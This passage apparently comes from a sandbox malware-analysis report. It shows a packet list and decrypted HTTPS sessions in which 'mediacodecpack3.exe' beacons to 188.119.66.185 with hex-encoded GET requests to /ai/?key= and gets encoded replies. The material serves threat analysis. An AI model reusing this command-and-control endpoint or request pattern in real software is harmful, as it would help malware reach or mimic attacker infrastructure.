                                                                                          Dec 18, 2024 13:45:33.492117882 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.492403030 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.492419004 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.172116995 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.172199011 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.172689915 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:35.172698021 CET44349837188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:35.172854900 CET49837443192.168.2.4188.119.66.185
Dec 18, 2024 13:45:35.172859907 CET  443    49837  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:35.882014990 CET  443    49837  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:35.882080078 CET  443    49837  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:35.882209063 CET  49837  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:35.882381916 CET  49837  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:35.882400036 CET  443    49837  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:35.994149923 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:35.994190931 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:35.994525909 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:35.994601965 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:35.994610071 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:37.453876972 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:37.453938961 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:37.454461098 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:37.454477072 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:37.454694033 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:37.454704046 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:38.164594889 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:38.164655924 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:38.164665937 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:38.164678097 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:38.164735079 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:38.164764881 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:38.164966106 CET  49843  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:38.164979935 CET  443    49843  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:38.273550034 CET  49849  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:38.273648024 CET  443    49849  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:38.273741961 CET  49849  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:38.274019957 CET  49849  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:38.274058104 CET  443    49849  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:39.913723946 CET  443    49849  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:39.918051958 CET  49849  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:39.919998884 CET  49849  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:39.920021057 CET  443    49849  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:39.925173044 CET  49849  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:39.925189972 CET  443    49849  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:40.598942041 CET  443    49849  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:40.599016905 CET  443    49849  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:40.599091053 CET  49849  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:40.599344969 CET  49849  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:40.599380016 CET  443    49849  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:40.710850954 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:40.710913897 CET  443    49855  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:40.710983038 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:40.711339951 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:40.711359978 CET  443    49855  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:42.175606966 CET  443    49855  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:42.175674915 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:42.176124096 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:42.176141024 CET  443    49855  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:42.176314116 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:42.176322937 CET  443    49855  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:43.032818079 CET  443    49855  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:43.032886028 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:43.032905102 CET  443    49855  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:43.032953024 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:43.042020082 CET  49855  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:43.042046070 CET  443    49855  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:43.148296118 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:43.148349047 CET  443    49861  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:43.148427963 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:43.148689032 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:43.148706913 CET  443    49861  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:44.632647991 CET  443    49861  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:44.633871078 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:44.639102936 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:44.639116049 CET  443    49861  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:44.639261961 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:44.639267921 CET  443    49861  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:45.355252028 CET  443    49861  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:45.355356932 CET  443    49861  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:45.355405092 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:45.355406046 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:45.399626970 CET  49861  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:45.399655104 CET  443    49861  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:45.614869118 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:45.614891052 CET  443    49867  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:45.614969015 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:45.624692917 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:45.624708891 CET  443    49867  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:47.273571014 CET  443    49867  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:47.273710012 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:47.274228096 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:47.274239063 CET  443    49867  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:47.274430990 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:47.274435997 CET  443    49867  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:48.150911093 CET  443    49867  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:48.151016951 CET  443    49867  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:48.151036024 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:48.151067972 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:48.152339935 CET  49867  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:48.152344942 CET  443    49867  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:48.273159027 CET  49878  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:48.273200035 CET  443    49878  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:48.273292065 CET  49878  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:48.273551941 CET  49878  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:48.273565054 CET  443    49878  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:49.799698114 CET  443    49878  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:49.799807072 CET  49878  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:49.800255060 CET  49878  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:49.800270081 CET  443    49878  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:49.800467014 CET  49878  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:49.800472021 CET  443    49878  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:50.527865887 CET  443    49878  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:50.527932882 CET  443    49878  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:50.528076887 CET  49878  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:50.576919079 CET  49878  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:50.576939106 CET  443    49878  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:50.695166111 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:50.695225954 CET  443    49883  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:50.695558071 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:50.695796967 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:50.695808887 CET  443    49883  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:52.148727894 CET  443    49883  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:52.148792028 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.149368048 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.149379015 CET  443    49883  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:52.149684906 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.149689913 CET  443    49883  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:52.835139990 CET  443    49883  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:52.835206032 CET  443    49883  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:52.835257053 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.835283995 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.835587978 CET  49883  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.835608006 CET  443    49883  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:52.945089102 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.945147038 CET  443    49889  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:52.945291996 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.945622921 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:52.945636034 CET  443    49889  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:54.395134926 CET  443    49889  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:54.395265102 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:54.395817995 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:54.395823956 CET  443    49889  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:54.396008015 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:54.396012068 CET  443    49889  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:55.077147961 CET  443    49889  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:55.077234030 CET  443    49889  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:55.077282906 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:55.077320099 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:55.077456951 CET  49889  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:55.077475071 CET  443    49889  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:55.196115971 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:55.196157932 CET  443    49894  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:55.196229935 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:55.196616888 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:55.196631908 CET  443    49894  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:56.835042000 CET  443    49894  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:56.835103035 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:56.836113930 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:56.836113930 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:56.836122036 CET  443    49894  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:56.836128950 CET  443    49894  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:57.544200897 CET  443    49894  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:57.544266939 CET  443    49894  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:57.544388056 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:57.544388056 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:57.544670105 CET  49894  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:57.544694901 CET  443    49894  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:57.665142059 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:57.665190935 CET  443    49900  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:57.665262938 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:57.665581942 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:57.665596008 CET  443    49900  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:59.123914003 CET  443    49900  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:59.123986959 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.124547958 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.124555111 CET  443    49900  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:59.124738932 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.124743938 CET  443    49900  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:59.807970047 CET  443    49900  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:59.808042049 CET  443    49900  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:59.808088064 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.808088064 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.813894987 CET  49900  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.813919067 CET  443    49900  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:59.956127882 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.956168890 CET  443    49905  188.119.66.185  192.168.2.4
Dec 18, 2024 13:45:59.956252098 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.956517935 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:45:59.956532955 CET  443    49905  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:01.600328922 CET  443    49905  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:01.600395918 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:01.600769043 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:01.600775003 CET  443    49905  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:01.602596998 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:01.602602959 CET  443    49905  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:02.411747932 CET  443    49905  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:02.411807060 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:02.411820889 CET  443    49905  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:02.412044048 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:02.477344036 CET  49905  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:02.477384090 CET  443    49905  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:02.730595112 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:02.730643034 CET  443    49911  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:02.730792046 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:02.742731094 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:02.742757082 CET  443    49911  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:04.210747957 CET  443    49911  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:04.210833073 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:04.213308096 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:04.213308096 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:04.213323116 CET  443    49911  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:04.213339090 CET  443    49911  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:04.897619963 CET  443    49911  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:04.897696018 CET  443    49911  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:04.897731066 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:04.897814989 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:04.898766041 CET  49911  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:04.898798943 CET  443    49911  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:05.010061026 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:05.010097027 CET  443    49918  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:05.010152102 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:05.010420084 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:05.010433912 CET  443    49918  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:06.463645935 CET  443    49918  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:06.464107990 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:06.465538025 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:06.465543985 CET  443    49918  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:06.469510078 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:06.469516039 CET  443    49918  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:07.434654951 CET  443    49918  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:07.434710979 CET  443    49918  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:07.434724092 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:07.434773922 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:07.434915066 CET  49918  443    192.168.2.4     188.119.66.185
Dec 18, 2024 13:46:07.434930086 CET  443    49918  188.119.66.185  192.168.2.4
Dec 18, 2024 13:46:07.556705952 CET  49924  443    192.168.2.4     188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.556751966 CET44349924188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:07.556848049 CET49924443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.557984114 CET49924443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:46:07.558012009 CET44349924188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:09.283809900 CET44349924188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:46:09.283893108 CET49924443192.168.2.4188.119.66.185
                                                                                          • 188.119.66.185
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:44:58 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:44:59 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:44:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:44:59 UTC | 768 | IN | Data Raw: 32 66 34 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 62 32 30 62 36 62 36 39 30 38 36 33 65 34 38 61 36 33 62 64 62 38 34 37 35 64 63 32 63 31 66 64 34 30 33 63 32 64 31 36 30 35 34 65 37 31 38 63 33 34 32 37 61 32 61 37 33 38 61 62 32 31 35 66 39 61 64 34 30 64 63 38 36 62 31 63 65 33 35 36 62 64 33 66 34 35 35 64 62 39 37 66 32 34 66 64 64 64 33 39 66 35 35 61 63 62 64 66 35 63 35 30 61 31 64 63 36 64 35 30 37 30 30 64 63 33 32 32 36 30 37 64 32 33 32 38 39 64 65 64 33 39 34 35 64 34 38 63 32 37 39 33 31 65 37 64 66 30 30 34 62 36 65 31 34 37 37 64 33 66 31 31 30 37 66 62 33 66 32 35 66 61 65 65 65 65 30 35 35 61 32 36 61 63 37 63 65 32 30 65 62 66 31 63 34 65 65 35 34 31 33 38 66 35 32 39 39 33 65 61 66 33 34
    Data Ascii: 2f48b723c68ee18403c660fbfe0384b20b6b690863e48a63bdb8475dc2c1fd403c2d16054e718c3427a2a738ab215f9ad40dc86b1ce356bd3f455db97f24fddd39f55acbdf5c50a1dc6d50700dc322607d23289ded3945d48c27931e7df004b6e1477d3f1107fb3f25faeeee055a26ac7ce20ebf1c4ee54138f52993eaf34


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49755 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:04 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:04 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:04 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:04 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49761 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:06 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:07 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:07 UTC | 630 | IN | Data Raw: 32 36 61 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 62 36 63 33 35 65 34 65 38 35 37 65 61 61 65 34 30 64 64 38 36 62 31 63 62 33 32 37 66 64 33 66 34 35 32 63 35 39 64 66 32 34 39 63 39 64 30 39 39 34 62 61 64 62 32 66 31 64 66 30 61 30 37 63 65 64 63 30 34 31 65 64 65 33 33 32 66 31 65 64 62 32 65 38 64 64 30 64 33 38 61 35 66 34 61 63 62 36 65 33 37 66 39 64 37 30 35 35 35 36 66 31 30 37 39 63 63 66 34 31 63 36 38 62 66 66 30 34 31 61 61 65 66 66 35 35 33 61 63 37 33 63 63 63 62 32 31 66 35 66 33 63 64 65 34 34 38 30 65 38 64 35 38 39 38 32 30 61 65 33 32
    Data Ascii: 26a8b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123b6c35e4e857eaae40dd86b1cb327fd3f452c59df249c9d0994badb2f1df0a07cedc041ede332f1edb2e8dd0d38a5f4acb6e37f9d705556f1079ccf41c68bff041aaeff553ac73cccb21f5f3cde4480e8d589820ae32


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49768 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:09 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:09 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:09 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:09 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49774 | 188.119.66.185 | 443 | 5544 | C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 12:45:11 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
    Host: 188.119.66.185
2024-12-18 12:45:11 UTC | 200 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 18 Dec 2024 12:45:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/7.4.33
2024-12-18 12:45:11 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
